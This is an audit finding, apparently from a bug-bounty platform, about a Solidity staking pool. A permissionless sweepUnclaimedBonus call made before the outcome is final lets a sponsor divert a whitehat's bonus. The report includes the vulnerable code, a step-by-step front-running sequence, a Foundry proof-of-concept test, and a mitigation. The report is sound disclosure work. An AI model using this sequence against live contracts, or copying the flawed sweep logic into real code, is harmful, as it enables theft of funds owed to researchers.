FoundrySolidityLayer 2
7.25 ETH
Submission Details
Impact: high
Likelihood: medium

A permissionless `sweepUnclaimedBonus` during a re-flaggable SURVIVED outcome permanently strips the bonus from a good-faith CORRUPTED whitehat

Author Revealed upon completion

Root + Impact

Description

The specification guarantees that a goodFaith_= true and CORRUPTED resolution pays the named whitehat the entire pool, principal and bonus, and explicitly states this holds even when riskWindowStart == 0.

See docs/DESIGN.md §12: "the entire pool is the named attacker's bounty" (snapshotTotalStaked + snapshotTotalBonus), and protocol-readme.md: CORRUPTED sweeps "the pool whole, bonus included."

sweepUnclaimedBonus() breaks that guarantee. It is callable while the outcome is still a re-flaggable moderator SURVIVED, it does not latch claimsStarted, and in the riskWindowStart == 0 branch it irreversibly transfers the entire bonus to recoveryAddress and zeroes totalBonus. When the moderator then corrects the outcome to good-faith CORRUPTED, flagOutcome re-snapshots snapshotTotalBonus == 0, so bountyEntitlement collapses to snapshotTotalStaked. The whitehat is paid principal only, the bonus they are entitled to is stranded at the sponsor-controlled recoveryAddress.

Because the sweep is permissionless and the sponsor owns recoveryAddress, the sponsor (or anyone acting in their interest) can front-run the moderator's SURVIVED → CORRUPTED correction, turning a legitimate outcome correction into an irreversible, self-profiting diversion of the whitehat's bounty.

The documentation states that good-faith CORRUPTED pays the whitehat the whole pool including the bonus:

  • docs/DESIGN.md §12 (CORRUPTED bounty mechanics):

    "For good-faith CORRUPTED, bountyEntitlement and corruptedReserve are both set to snapshotTotalStaked + snapshotTotalBonus.

sweepUnclaimedBonus() applies the "no observable risk → bonus to recoveryAddress" decision to a non-final outcome, and does so irreversibly:

function sweepUnclaimedBonus() external nonReentrant {
if (outcome != PoolStates.Outcome.SURVIVED && outcome != PoolStates.Outcome.EXPIRED) {
revert OutcomeNotEligibleForSweep();
}
uint256 reserved;
if (totalEligibleStake != 0) {
reserved = totalEligibleStake;
@> if (riskWindowStart != 0) { // riskWindowStart == 0 -> the bonus is NOT reserved
reserved += snapshotTotalBonus - claimedBonus;
}
}
uint256 freeBalance = stakeToken.balanceOf(address(this));
@> uint256 amount = freeBalance > reserved ? freeBalance - reserved : 0; // == the entire bonus
if (amount == 0) revert NothingToSweep();
if (totalEligibleStake == 0 || riskWindowStart == 0) {
@> totalBonus -= amount <= totalBonus ? amount : totalBonus; // totalBonus -> 0
}
// Intentionally does NOT set claimsStarted (L517) <-- leaves the re-flag window OPEN
stakeToken.safeTransfer(recoveryAddress, amount);
}

A moderator SURVIVED flag does not set claimsStarted either, so between a SURVIVED flag and a CORRUPTED correction the bonus can be permanently removed. flagOutcome then re-snapshots the depleted totalBonus:

// flagOutcome, re-flag while claimsStarted == false
snapshotTotalBonus = totalBonus; // == 0 after the sweep
...
bountyEntitlement = willBeGoodFaithCorrupted
@> ? snapshotTotalStaked + snapshotTotalBonus : 0; // == snapshotTotalStaked only

Note the contradiction with DESIGN.md §4, which justifies the finality latch by asserting *"once value has left the contract, a corrective re-flag cannot be honored without breaking balance accounting", yet sweepUnclaimedBonus lets value leave and keeps the re-flag window open, precisely the state §4 says should not exist.

Let's walk through an example to better understand the issue.

  1. flagOutcome(SURVIVED, false, 0), claimsStarted stays false.

  2. sweepUnclaimedBonus(), called by any address (in practice the sponsor, who owns recoveryAddress). riskWindowStart == 0 ⇒ the entire bonus is swept to recoveryAddress; totalBonus → 0; claimsStarted still false.

  3. flagOutcome(CORRUPTED, true, whitehat), moderator corrects to goodFaith_= true and CORRUPTED (allowed, claimsStarted == false). Re-snapshot ⇒ snapshotTotalBonus == 0, bountyEntitlement == snapshotTotalStaked.

  4. claimAttackerBounty(), whitehat receives snapshotTotalStaked (principal only). The bonus is gone.

Risk

Likelihood:

  • Medium likelihood because sweepUnclaimedBonus() is permissionless and can be called by anyone and reflagging can occur during normal operation.

Impact:

  • High impact because the whitehat loses part of the funds (the bonus) and contradicts the specification defined in DESIGN.md.

Proof of Concept

Run:

forge test --match-test test_PoC_WhitehatUnderpaidAfterBonusSweep -vv

test/poc/SweepReflagBountyLeak.poc.t.sol:

// SPDX-License-Identifier: MIT
pragma solidity 0.8.26;
import {IConfidencePool} from "src/interfaces/IConfidencePool.sol";
import {IAttackRegistry} from "@battlechain/interface/IAttackRegistry.sol";
import {PoolStates} from "src/libraries/PoolStates.sol";
import {BaseConfidencePoolTest} from "test/helpers/BaseConfidencePoolTest.sol";
/// @notice PoC: `sweepUnclaimedBonus` moves the real bonus pot while the outcome is still
/// re-flaggable, under-paying a later good-faith CORRUPTED whitehat.
///
/// An intervening permissionless `sweepUnclaimedBonus` during the SURVIVED phase (riskWindowStart
/// == 0) removes the bonus WITHOUT latching `claimsStarted`, so the still-open re-flag to good-faith
/// CORRUPTED re-snapshots a depleted `totalBonus`. The whitehat is paid principal only; the bonus is
/// stranded at the sponsor-controlled `recoveryAddress`.
contract SweepReflagBountyLeakPoC is BaseConfidencePoolTest {
uint256 internal constant PRINCIPAL = 1000 * ONE;
uint256 internal constant BONUS = 500 * ONE;
function test_PoC_WhitehatUnderpaidAfterBonusSweep() external {
_stake(alice, PRINCIPAL);
_contributeBonus(carol, BONUS);
// Registry is CORRUPTED but the pool never observed an active-risk state, so
// riskWindowStart stays 0 — the branch in which sweepUnclaimedBonus treats the whole
// bonus as un-owed.
attackRegistry.setAgreementState(IAttackRegistry.ContractState.CORRUPTED);
// Step 1 — moderator flags SURVIVED (out-of-scope breach judgement; permitted on a
// CORRUPTED registry per DESIGN.md §8).
vm.prank(moderator);
pool.flagOutcome(PoolStates.Outcome.SURVIVED, false, address(0));
assertEq(pool.riskWindowStart(), 0, "no risk window observed");
assertEq(pool.snapshotTotalBonus(), BONUS, "bonus is snapshotted under SURVIVED");
assertFalse(pool.claimsStarted(), "outcome still re-flaggable");
// Step 2 — ANY unprivileged address permissionlessly sweeps the unreserved bonus to the
// sponsor's recoveryAddress. Crucially it does NOT latch claimsStarted (root cause).
vm.prank(bob); // unprivileged third party
pool.sweepUnclaimedBonus();
assertEq(token.balanceOf(recovery), BONUS, "full bonus swept to sponsor recovery");
assertEq(pool.totalBonus(), 0, "totalBonus decremented to zero");
assertFalse(pool.claimsStarted(), "sweep left the re-flag window OPEN <-- root cause");
// Step 3 — moderator corrects to good-faith CORRUPTED (still allowed, claimsStarted false).
vm.prank(moderator);
pool.flagOutcome(PoolStates.Outcome.CORRUPTED, true, attacker);
assertEq(pool.snapshotTotalBonus(), 0, "re-snapshot reads the depleted totalBonus");
assertEq(pool.bountyEntitlement(), PRINCIPAL, "bounty collapses to principal only");
// Step 4 — whitehat claims and is under-paid.
vm.prank(attacker);
pool.claimAttackerBounty();
// === HARM: the whitehat receives principal only; the bonus is at the sponsor's recovery ===
assertEq(token.balanceOf(attacker), PRINCIPAL, "whitehat under-paid: principal only, no bonus");
assertEq(token.balanceOf(recovery), BONUS, "bonus diverted to sponsor recovery");
// Shortfall vs. the DESIGN.md §12 "whole pool" guarantee equals the swept bonus.
assertEq((PRINCIPAL + BONUS) - token.balanceOf(attacker), BONUS, "shortfall == swept bonus");
}
}

Recommended Mitigation

Do not let sweepUnclaimedBonus() release the bonus while the outcome is still re-flaggable, only sweep the bonus once the outcome is final.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!